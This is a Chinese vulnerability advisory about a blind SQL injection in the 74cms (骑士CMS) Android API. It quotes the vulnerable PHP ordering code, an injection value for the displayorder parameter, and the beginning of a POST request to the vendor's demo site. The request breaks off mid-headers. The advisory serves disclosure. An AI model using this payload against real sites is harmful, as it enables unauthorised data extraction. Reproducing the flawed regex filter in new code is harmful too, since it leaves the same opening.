骑士CMS某接口2处SQL盲注#2(官网demo测试)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 骑士CMS某接口2处SQL盲注#2(官网demo测试) ### 详细说明: 手机客户端2处接口存在SQL注入,SELECT注入无关键字过滤,理论上可以获取任意数据。 0x01: http://demo.74cms.com/android/jobs.php ========================================================= 对应代码: ``` 14 if (!empty($aset['displayorder'])) 15 { 16 $arr=explode('>',$aset['displayorder']); 17 $arr[1]=preg_match('/asc|desc/',$arr[1])?$arr[1]:"desc"; 18 if ($arr[0]=="rtime") 19 { 20 $orderbysql=" ORDER BY refreshtime {$arr[1]}"; 21 $jobstable=table('jobs_search_rtime'); 22 } ``` displayorder参数过滤不正确导致SQL注入。 "displayorder":"rtime> limit 1 #desc"返回一行数据: ``` POST /android/jobs.php HTTP/1.1 Host: demo.74cms.com User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: null Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 66 Cookie: safedog-flow-item=7308413BC1624F4F2DF983295AAE94E8;...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息